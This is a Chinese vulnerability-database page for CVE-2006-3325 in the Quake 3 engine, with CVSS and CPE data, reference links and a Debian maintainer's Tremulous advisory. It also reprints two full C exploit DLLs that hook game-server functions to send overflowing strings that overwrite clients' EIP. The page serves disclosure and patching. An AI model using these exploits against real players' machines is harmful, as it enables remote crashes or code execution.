CVE-2006-3325
CVSS5.0
发布时间 :2006-06-30 19:05:00
修订时间 :2011-03-07 21:38:21
NMCOEP    

[原文]client/cl_parse.c in the id3 Quake 3 Engine 1.32c and the Icculus Quake 3 Engine (ioquake3) revision 810 and earlier allows remote malicious servers to overwrite arbitrary write-protected cvars variables on the client, such as cl_allowdownload for Automatic Downloading and fs_homepath for the quake3 path, via a string of cvar names and values sent from the server. NOTE: this can be combined with another vulnerability to overwrite arbitrary files.


[CNNVD]Quake 3 client/cl_parse.c 输入验证漏洞(CNNVD-200606-604)

        id3 Quake 3 Engine 1.32c和Icculus Quake 3 Engine (ioquake3) 810修订版及更早版本中的client/cl_parse.c,可让远程恶意服务器通过从服务器发送的cvar名称和值字符串覆盖客户机上任意写保护的cvar变量,例如关于自动下载的cl_allowdownload和关于quake3路径的fs_homepath。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:id_software:quake_3_engine:icculus_809
cpe:/a:id_software:quake_3_engine:1.32c
cpe:/a:id_software:quake_3_engine
cpe:/a:id_software:quake_3_engine:icculus_804
cpe:/a:id_software:quake_3_engine:icculus_803
cpe:/a:id_software:quake_3_engine:icculus_810
cpe:/a:id_software:quake_3_engine:icculus_807
cpe:/a:id_software:quake_3_engine:icculus_808
cpe:/a:id_software:quake_3_engine:icculus_805
cpe:/a:id_software:quake_3_engine:1.32b
cpe:/a:id_software:quake_3_engine:icculus_806

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3325
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3325
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-604
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2569
(UNKNOWN)  VUPEN  ADV-2006-2569
http://www.securityfocus.com/bid/18685
(UNKNOWN)  BID  18685
http://www.securityfocus.com/archive/1/archive/1/438660/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060628 Re: Files and cvars overwriting in Quake 3 engine (1.32c / rev 803 / ...)
http://www.securityfocus.com/archive/1/archive/1/438515/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060627 Files and cvars overwriting in Quake 3 engine (1.32c / rev 803 / ...)
http://secunia.com/advisories/20851
(VENDOR_ADVISORY)  SECUNIA  20851
http://secunia.com/advisories/20401
(VENDOR_ADVISORY)  SECUNIA  20401
http://aluigi.altervista.org/adv/q3cfilevar-adv.txt
(UNKNOWN)  MISC  http://aluigi.altervista.org/adv/q3cfilevar-adv.txt
http://xforce.iss.net/xforce/xfdb/27486
(UNKNOWN)  XF  quake3-cvar-file-overwrite(27486)
http://xforce.iss.net/xforce/xfdb/26889
(UNKNOWN)  XF  quake3-clparsedownload-bo(26889)
http://securityreason.com/securityalert/1171
(UNKNOWN)  SREASON  1171

- 漏洞信息

Quake 3 client/cl_parse.c 输入验证漏洞
中危 资料不足
2006-06-30 00:00:00 2006-07-03 00:00:00
远程  
        id3 Quake 3 Engine 1.32c和Icculus Quake 3 Engine (ioquake3) 810修订版及更早版本中的client/cl_parse.c,可让远程恶意服务器通过从服务器发送的cvar名称和值字符串覆盖客户机上任意写保护的cvar变量,例如关于自动下载的cl_allowdownload和关于quake3路径的fs_homepath。

- 公告与补丁

        

- 漏洞信息 (1976)

Quake 3 Engine Client CG_ServerCommand() Remote Overflow Exploit (EDBID:1976)
windows dos
2006-07-02 Verified
0 RunningBon
N/A [点击下载]
/*
Quake 3 Engine Client CG_ServerCommand() Remote Stack Overflow Exploit (Win32)
Written by RunningBon

E-Mail: runningbon@gmail.com
IRC: irc.rizon.net #kik

This is a DLL, which gets injected into the server exe.

You will need Microsoft Detours library to compile this exploit (http://research.microsoft.com/sn/detours/)

Use this responsibly. You are responsible for any damage you cause using this.

Info:
The string is heavily filtered before the overflow occurs, so a lot of bytes get stripped. Might want to try alphanum shellcode..
*/

#include <stdio.h>
#include <windows.h>
#include <detours.h>

struct VersionStruct {
	char *pVersionString;
	DWORD dwVersionStringAddr;
	DWORD dwSendServerCommandAddr;
	DWORD dwFillSize;
	DWORD dwNewEIP;
};

VersionStruct Versions[] = {
	{ "SOF2MP GOLD V1.03", 0x5598F8, 0x478660, 999, 0x33333333 },	//SoF2 1.03
};

VersionStruct *pVersion = NULL;

void (*orig_SV_SendServerCommand)(LPVOID pCl, const char *fmt, ...);
void SV_SendServerCommand_Hook(LPVOID pCl, const char *fmt, ...)
{
	char szString[4096];
	char *pPtr = NULL;

	if(pVersion != NULL)
	{
		memset(szString, 0, sizeof(szString));
		pPtr = &szString[0];

		memset(pPtr, 'a', pVersion->dwFillSize);
		pPtr += pVersion->dwFillSize;

		memcpy(pPtr, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));
		pPtr += sizeof(DWORD);

		orig_SV_SendServerCommand(pCl, szString);
	}
}

bool WINAPI DllMain(HINSTANCE hInst, DWORD dwReason, LPVOID lpReserved)
{
	if(dwReason == DLL_PROCESS_ATTACH)
	{
		for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
		{
			if(!stricmp((char*)Versions[i].dwVersionStringAddr, Versions[i].pVersionString))
			{
				pVersion = &Versions[i];
				break;
			}
		}

		if(pVersion == NULL)
		{
			//Could not find correct version
			return 1;
		}

		DetourFunction((BYTE*)pVersion->dwSendServerCommandAddr, (BYTE*)SV_SendServerCommand_Hook);
		_asm mov [orig_SV_SendServerCommand], eax
	}

	return 1;
}

// milw0rm.com [2006-07-02]
		

- 漏洞信息 (1977)

Quake 3 Engine Client CS_ITEMS Remote Overflow Exploit (Win32) (EDBID:1977)
windows dos
2006-07-02 Verified
0 RunningBon
N/A [点击下载]
/*
Quake 3 Engine Client CS_ITEMS Remote Stack Overflow Exploit (Win32)
Written by RunningBon

E-Mail: runningbon@gmail.com
IRC: irc.rizon.net #kik

This is a DLL, which gets injected into the server exe.

You will need Microsoft Detours library to compile this exploit (http://research.microsoft.com/sn/detours/)
I recommend you compile this with Microsoft Visual C++

Use this responsibly. You are responsible for any damage you cause using this.

Info:
The engine strips bytes >127, '%', and '\0' before it overflows, so you will need encoded shellcode and an EIP which doesn't contain any of these characters.
*/

#include <stdio.h>
#include <windows.h>
#include <detours.h>

struct VersionStruct {
	char *pVersionString;
	DWORD dwVersionStringAddr;
	DWORD dwSetConfigstringAddr;
	DWORD dwFillSize;
	DWORD dwNewEIP;
	int iCS_ITEM;
};

VersionStruct Versions[] = {
	{ "Quake 3: Arena", 0x4C1B94, 0x431E70, 836, 0x13333337, 27 },	//Quake 3 Arena 1.32c
	{ "Quake 3: Arena", 0x4D2184, 0x438610, 836, 0x13333337, 27 },	//Quake 3 Arena 1.32b
};

VersionStruct *pVersion = NULL;

void (*orig_SV_SetConfigstring)(int iIndex, const char *pVal);
void SV_SetConfigstring_Hook(int iIndex, const char *pVal)
{
	char szString[4096];
	char *pPtr = NULL;

	if(pVersion != NULL)
	{
		if(iIndex == pVersion->iCS_ITEM)
		{
			memset(szString, 0, sizeof(szString));
			pPtr = &szString[0];

			memset(pPtr, 'a', pVersion->dwFillSize);
			pPtr += pVersion->dwFillSize;

			memcpy(pPtr, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));
			pPtr += sizeof(DWORD);

			orig_SV_SetConfigstring(iIndex, szString);

			return;
		}
	}

	orig_SV_SetConfigstring(iIndex, pVal);
}

bool WINAPI DllMain(HINSTANCE hInst, DWORD dwReason, LPVOID lpReserved)
{
	if(dwReason == DLL_PROCESS_ATTACH)
	{
		for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
		{
			if(!stricmp((char*)Versions[i].dwVersionStringAddr, Versions[i].pVersionString))
			{
				pVersion = &Versions[i];
				break;
			}
		}

		if(pVersion == NULL)
		{
			//Could not find correct version
			return 1;
		}

		DetourFunction((BYTE*)pVersion->dwSetConfigstringAddr, (BYTE*)SV_SetConfigstring_Hook);
		_asm mov [orig_SV_SetConfigstring], eax
	}

	return 1;
}

// milw0rm.com [2006-07-02]
		

- 漏洞信息 (F110095)

Tremulous Inherited Issues (PacketStormID:F110095)
2012-02-23 00:00:00
Simon McVittie  
advisory,vulnerability
CVE-2006-2082,CVE-2006-2236,CVE-2006-2875,CVE-2006-3324,CVE-2006-3325,CVE-2011-2674,CVE-2011-3012
[点击下载]

Tremulous, a team based FPS game with RTS elements, suffers from a large amount of old Quake related vulnerabilities.

Background
==========

Tremulous is a team-based FPS game with RTS elements. Its engine and
game logic are based on the GPL source release of the Quake III Arena
engine and game logic by id Software.

The de facto upstream developer of the Quake III engine is now another
fork, ioquake3; in particular, ioquake3 fixes many security
vulnerabilities present in the original Quake III Arena source release.
Unlike (for instance) OpenArena or Urban Terror, Tremulous has diverged
from the original Quake III Arena engine, so it cannot be played using
an unmodified ioquake3 engine.

The Tremulous website advertises two versions of the game:

* 1.1.0, a stable release (released 2006-03-31). This is packaged
  in Debian/Ubuntu stable releases, and also appears to be packaged
  in FreeBSD, openSUSE and Gentoo.

* GPP1 ("Gameplay Preview 1"), a preview release (2009-12-03) of
  what will eventually become Tremulous 1.2. This
  appears to be packaged in Fedora stable releases.

In addition, there are several unofficial engine updates compatible with
1.1.0, notably a backport by Tony White (TJW), and a set of updated
client and server provided by Mercenaries' Guild. These are not
publicized by the main Tremulous website, but they are apparently
popular with players, and their functionality has been incorporated into
version 1.2 development.

Vulnerabilities
===============

Numerous security vulnerabilities have been reported and fixed in
ioquake3 since its initial release. Neither Tremulous 1.1.0 nor GPP1
incorporates fixes for all of these vulnerabilities.

I believe this table is more or less accurate, but I have only checked
Tremulous 1.1.0 in detail. If you ship one of the other versions, you
will need to do your own checks.

               Trem-1.1.0    MGC-1.011    MGS-1.01     tjw    Trem-GPP1
CVE-2001-1289       OK           OK           OK        OK       OK
CVE-2005-0430       OK           OK           OK        OK       OK
CVE-2005-0983       OK           OK           OK        OK       OK
CVE-2006-2082       Vuln         n/a          ?         Vuln     OK
CVE-2006-2236       Vuln         OK           n/a       OK       OK
CVE-2006-2875       Vuln         OK           n/a       OK       OK
CVE-2006-3324       Vuln         OK           n/a       Vuln     OK
CVE-2006-3325       Vuln         OK           n/a       Vuln     OK
CVE-2006-3400       OK           OK           OK        OK       OK
CVE-2006-3401       OK           OK           OK        OK       OK
CVE-2011-1412       OK           OK           OK        OK       OK
CVE-2011-2674       Vuln         Vuln         n/a       Vuln     Vuln
CVE-2011-3012       Vuln         OK           n/a       Vuln     OK

(For completeness, the table lists all CVE IDs I've found listed for
either Quake III Arena or ioquake3.)

Key: Trem-1.1.0 = Tremulous 1.1.0 (2006-03-31)
     MGC-1.011 = MercenariesGuild client 1.011 when used as a client
     MGS-1.01 = MercenariesGuild server 1.01 when used as a server
     tjw = http://tremulous.tjw.org/backport/
     Trem-GPP1 = Tremulous Gameplay Preview 1 (1.2 prerelease,
                 2009-12-03)

     Vuln = vulnerable
     partial = partial fix, probably still vulnerable
     n/a = server-specific bug not applicable to client or vice versa

In addition, searching ioquake3 commit history reveals a number of
commits which do not appear to be related to a CVE number, but could be
security-sensitive. I have not analyzed which of these could affect the
Tremulous engine. If you cause a new CVE number to be assigned for any
changes made to ioquake3 in the past (as was done for CVE-2011-3012),
please include a prominent reference to the relevant svn revision in any
advisory, so that CVE numbers can be correlated with the changes required.

Finally, to the best of my knowledge, ioquake3 upstream do not consider
the QVM bytecode interpreter to be safe for use with untrusted bytecode;
this means that auto-downloading (cl_allowDownload 1) is not considered
to be safe under any circumstances. This is particularly the case for
engines which do not have the interpreter/JIT hardening work that was
done in ioquake3 at svn revisions around 1687, 1717 and 2000, none of
which is present in at least Tremulous 1.1.0.

Response
========

I have not received any response from Tremulous developers since I
contacted them privately 1 month ago.

Distributions like Debian, Fedora and Ubuntu should either fix the open
vulnerabilities, or remove affected Tremulous versions from their
repositories entirely.

I have uploaded tremulous 1.1.0-7 to Debian, with backports of the
various CVE fixes from ioquake3, and some additional pre-emptive changes
for potential bugs which are not known to be exploitable (avoiding
non-constant format strings and sprintf() into a fixed-length buffer).
Patches which I believe to be correct are available at
<http://anonscm.debian.org/gitweb/?p=pkg-games/tremulous.git;a=tree;f=debian/patches>
or by cloning the git repository
<git://anonscm.debian.org/pkg-games/tremulous.git>. Please contact me
via the Debian bug tracking system or the Games Team mailing list
<debian-devel-games@lists.debian.org> with testing results or
corrections for these patches.

I believe that long-term-supported distributions should also mitigate
any future vulnerabilities in the ioquake3 bytecode interpreter by
removing client-side support for auto-downloading (always behaving as if
configured with cl_allowDownload 0) in their stable releases. I have
made this change in Debian's tremulous 1.1.0-7 package, but not yet in
Debian's ioquake3 package.

Regards,
    S
    

- 漏洞信息

26929
Multiple Vendor Quake 3 Engine client/cl_parse.c cvars Variable Overwrite
Exploit Public Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-06-27 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站